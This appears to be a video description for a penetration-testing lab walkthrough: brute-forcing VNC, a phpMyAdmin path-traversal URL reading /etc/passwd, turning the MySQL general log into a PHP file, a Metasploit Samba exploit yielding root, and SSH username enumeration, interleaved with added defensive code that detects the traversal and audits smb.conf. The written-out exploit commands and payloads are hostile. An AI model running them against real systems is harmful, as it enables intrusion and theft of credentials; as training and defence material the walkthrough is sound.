Project 51 - Exploiting Legacy Versions of Protocols
Author: Daryl Shows His Work
Uploaded: 2025-10-22
Views: 10
Description:
Commands Used/Steps Taken (in the order that they appear in the video):
1. cd Exploiting-Public-Facing-App (to change to the directory where our Python script is located)
2. python3 brutedum.py (to run BruteDum)
3. Target Host: localhost, Nmap scan: y, Protocol to brute force: 6 (VNC), Use Hydra: 2
4. Top207-probable-v2.txt (word list to use)
5. Run on default port: n, run on port 5901 (we have our own intel that VNC is running on an alternate port)
6. Looks like we found a password: 123456
7. Open a browser and go to http://192.168.1.101/phpmyadmin
8. Enter this into the browser: http://192.168.1.101/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
9. Click on "SQL" tab at the top, enter in SHOW VARIABLES LIKE 'general%' ; (and click Go)
10. Click on "SQL" tab at the top, enter in SET GLOBAL general_log= 'on' (to set the general log to ON)
11. Click on "SQL" tab at the top, enter in SET GLOBAL general_log_file= '1.php' (to change the log file to 1.php)
12. Click on "SQL" tab at the top, enter in SHOW VARIABLES LIKE 'general%' ; (to verify the changes)
13. Click on "SQL" tab at the top, enter in select '<?php phpinfo(); ?>' (to write the query into the new 1.php log file)
14. nmap -sC -sV samba (to run an nmap scan against the host name "samba"; take note of the host name)
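Steps 7-13 leave two distinct traces on the server: a double-encoded traversal request in the web server's access log, and privileged SET GLOBAL statements that point the MySQL general log at a script file. The following is an added detection example for this walkthrough, not code from the video or from any tool it uses. The log lines are constructed (Apache combined-log style and MySQL general query log style) and the regexes are assumptions about those formats; adjust them to your own logging.

```python
"""Detection logic for the phpMyAdmin path-traversal and MySQL general_log
abuse shown in steps 7-13 (added example; formats and regexes are assumptions)."""
import re
from urllib.parse import unquote

# Constructed web-server access log lines (not captured from the lab).
ACCESS_LOG = [
    '192.168.1.50 - - [22/Oct/2025:10:01:02 +0000] "GET /phpmyadmin/index.php HTTP/1.1" 200 5123',
    '192.168.1.50 - - [22/Oct/2025:10:01:09 +0000] "GET /phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd HTTP/1.1" 200 2048',
    '192.168.1.50 - - [22/Oct/2025:10:03:44 +0000] "GET /phpmyadmin/1.php HTTP/1.1" 200 60211',
]

# Constructed MySQL general query log lines (not captured from the lab).
GENERAL_LOG = [
    "2025-10-22T10:02:10.000000Z\t12 Query\tSHOW VARIABLES LIKE 'general%'",
    "2025-10-22T10:02:31.000000Z\t12 Query\tSET GLOBAL general_log= 'on'",
    "2025-10-22T10:02:55.000000Z\t12 Query\tSET GLOBAL general_log_file= '1.php'",
    "2025-10-22T10:03:20.000000Z\t12 Query\tselect '<?php phpinfo();?>'",
]

ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)')
LOG_ENABLE_RE = re.compile(r"SET\s+GLOBAL\s+general_log\s*=\s*'?(on|1)'?", re.I)
LOG_FILE_RE = re.compile(r"SET\s+GLOBAL\s+general_log_file\s*=\s*'([^']*)'", re.I)
PHP_TAG_RE = re.compile(r"<\?(php|=)", re.I)
SCRIPT_EXT = (".php", ".phtml", ".phar")


def decode_fully(value, max_rounds=3):
    """Percent-decode until stable so %253f (double-encoded '?') is seen as '?'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_traversal(lines):
    """Return (source_ip, decoded_path) for requests whose decoded path climbs directories."""
    hits = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if not m:
            continue
        ip, _method, path = m.groups()
        decoded = decode_fully(path)
        if "../" in decoded or "..\\" in decoded:
            hits.append((ip, decoded))
    return hits


def find_log_redirection(lines):
    """Return (kind, detail) findings for the general log being turned into a script file."""
    findings = []
    for line in lines:
        if LOG_ENABLE_RE.search(line):
            findings.append(("general_log_enabled", line.split("\t")[-1]))
        m = LOG_FILE_RE.search(line)
        if m:
            path = m.group(1)
            # Any change of general_log_file is privileged; a script extension is the webshell pattern.
            kind = "log_file_to_script" if path.lower().endswith(SCRIPT_EXT) else "log_file_changed"
            findings.append((kind, path))
        if PHP_TAG_RE.search(line):
            findings.append(("php_tag_in_query", line.split("\t")[-1]))
    return findings


if __name__ == "__main__":
    for ip, path in find_traversal(ACCESS_LOG):
        print(f"traversal from {ip}: {path}")
    for kind, detail in find_log_redirection(GENERAL_LOG):
        print(f"{kind}: {detail}")
```

Decoding the path repeatedly matters: a single unquote of the request in step 8 still shows `%3f`, and a filter that only looks at the raw path misses the `../` sequence entirely. On the database side, the SET GLOBAL statements themselves require the SUPER privilege, so any change to general_log_file from a web-facing account is worth an alert even when the new path is not a script.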
15. We can see that ports 22, 80, and 445 are all open on the device
16. msfconsole (to start Metasploit framework)
17. search smb_version (to look for auxiliary or exploit utility)
18. use auxiliary/scanner/smb/smb_version (to choose tool to use)
19. set RHOSTS 192.168.1.101 (to set our remote host to the target machine)
20. exploit (to run)
21. Metasploit tells us that the host is running Samba 4.3.8-Ubuntu
22. use exploit/linux/samba/is_known_pipename (to use a module that triggers an arbitrary shared library load vulnerability in this Samba version)
23. set RHOST 192.168.1.101
24. set SMB::AlwaysEncrypt false
25. set SMB::ProtocolVersion 1
26. exploit
27. id (no prompt confirming a successful session will appear, so run id to check)
28. We can see that we now have a root session on the target host
29. Ctrl + C to end shell session and exit to quit Metasploit
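On the defending side, steps 22-28 hinge on three smb.conf settings: whether named-pipe access is enabled at all, whether SMB1 is still negotiable (the module above is pinned to SMB::ProtocolVersion 1), and whether a guest can write to a share, which is how a library reaches the server's filesystem in the first place. The following auditor is an added example for this walkthrough, not Samba's code or code from the video; both configs are constructed, and the parser is a deliberately minimal reading of smb.conf syntax.

```python
"""Audit an smb.conf for the settings relevant to the Samba shared-library-load
technique in steps 22-28 (added example; sample configs are constructed)."""

WEAK_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba)
   map to guest = Bad User
   ; neither 'server min protocol' nor 'nt pipe support' is set

[data]
   path = /srv/samba/data
   writable = yes
   guest ok = yes

[secure]
   path = /srv/samba/secure
   read only = yes
"""

HARDENED_CONF = """\
[global]
   workgroup = WORKGROUP
   server min protocol = SMB2
   nt pipe support = no
   map to guest = Never

[data]
   path = /srv/samba/data
   read only = yes
   guest ok = no
"""

SMB1_DIALECTS = {"core", "coreplus", "lanman1", "lanman2", "nt1"}


def parse_smb_conf(text):
    """Minimal smb.conf parser: returns {section: {key: value}} with lower-cased keys."""
    conf, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            conf.setdefault(section, {})
        elif "=" in line and section is not None:
            key, value = line.split("=", 1)
            conf[section][key.strip().lower()] = value.strip()
    return conf


def is_yes(value):
    return value is not None and value.strip().lower() in {"yes", "true", "1"}


def share_is_writable(share):
    # 'writable'/'writeable' are synonyms; 'read only = no' means the same thing.
    if "writable" in share or "writeable" in share:
        return is_yes(share.get("writable", share.get("writeable")))
    if "read only" in share:
        return not is_yes(share["read only"])
    return False  # a share is read-only unless the config says otherwise


def audit(conf):
    """Return a list of finding codes; an empty list means nothing was flagged."""
    findings = []
    g = conf.get("global", {})
    # Releases of the era shown (4.3.x) default 'server min protocol' to NT1, i.e. SMB1 allowed.
    if g.get("server min protocol", "NT1").lower() in SMB1_DIALECTS:
        findings.append("smb1_allowed")
    # 'nt pipe support = no' is the workaround Samba documented for this bug class.
    if g.get("nt pipe support", "yes").lower() != "no":
        findings.append("nt_pipe_support_enabled")
    for name, share in conf.items():
        if name == "global" or is_yes(share.get("printable")):
            continue
        guest = is_yes(share.get("guest ok", share.get("public", "no")))
        if guest and share_is_writable(share):
            findings.append(f"guest_writable_share:{name}")
    return findings


if __name__ == "__main__":
    print("weak:", audit(parse_smb_conf(WEAK_CONF)))
    print("hardened:", audit(parse_smb_conf(HARDENED_CONF)))
```

The real fix is the Samba upgrade, which the version string from step 21 is the cue for; the config checks are the compensating controls that can be applied while that is scheduled, and they are also what to verify afterwards so that a patched host does not stay needlessly exposed.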
30. nmap -sV -p22 192.168.1.102 (to run a nmap scan against port 22 of target host)
31. We can see that it's running OpenSSH 6.7p1 on port 22 of the target and falls within the range of exploitable versions
32. nano usernames.txt (to create a username list with the text editor)
33. chmod +x ssh_enum.py (to make python script we will be using executable)
34. python3 ssh_enum.py 192.168.1.102 -w usernames.txt > valid.txt (to run the Python script with our username list and save the output to a new file)
35. cat valid.txt (to display the contents of the new output file)
36. We can see that admin is a valid username